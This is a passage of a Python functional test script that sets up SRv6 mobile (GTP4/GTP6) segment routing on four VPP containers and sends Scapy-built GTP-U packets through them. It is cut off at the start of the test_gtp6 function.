c1.vppctl_exec("sr policy add bsid D4:: next D2:1111:aaaa:bbbb::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid prefix D2:1111:aaaa::/48 behavior end usid 16")
c3.vppctl_exec("sr localsid prefix D2:1111:bbbb::/48 behavior end usid 16")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D2:1111:bbbb::/48")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
time.sleep(10)
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(type=1, R=1, QFI=3) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_echo(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_request", S=1, teid=200, seq=200))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_reply(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_response", S=1, teid=200, seq=200))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_error(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="error_indication", S=1, teid=200, seq=200)/
IE_TEIDI(TEIDI=65535)/IE_GSNAddress(address="1.1.1.1")/
IE_PrivateExtension(extention_value="z"))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(type=1, R=1, QFI=3) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_echo(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_request", S=1, teid=200, seq=300))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_reply(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_response", S=1, teid=200, seq=300))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_error(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="error_indication", S=1, teid=200, seq=300)/
IE_TEIDI(TEIDI=65535)/IE_GSNAddress(address="1.1.1.1")/
IE_PrivateExtension(extention_value="z"))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
